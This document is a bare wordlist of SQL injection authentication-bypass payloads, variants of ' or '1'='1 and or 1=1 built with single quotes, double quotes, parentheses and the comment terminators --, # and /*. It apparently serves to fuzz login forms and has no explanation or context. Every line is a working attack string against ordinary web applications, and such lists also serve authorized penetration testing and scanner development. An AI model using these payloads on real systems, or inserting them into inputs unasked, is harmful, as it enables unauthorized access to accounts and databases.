'
' --
' #
'/*
' or '1'='1
' or '1'='1'--
' or '1'='1'#
' or '1'='1'/*
'or 1=1 or ''='
' or 1=1
' or 1=1--
' or 1=1#
' or 1=1/*
') or ('1'='1
') or ('1'='1'--
') or ('1'='1'#
') or ('1'='1'/*
') or '1'='1
') or '1'='1'--
') or '1'='1'#
') or '1'='1'/*
" --
" #
"/*
" or "1"="1
" or "1"="1"--
" or "1"="1"#
" or "1"="1"/*
"or 1=1 or ""="
" or 1=1
" or 1=1--
" or 1=1#
" or 1=1/*
") or ("1"="1
") or ("1"="1"--
") or ("1"="1"#
") or ("1"="1"/*
") or "1"="1
") or "1"="1"--
") or "1"="1"#
") or "1"="1"/*
or 1=1
or 1=1--
or 1=1#
or 1=1/*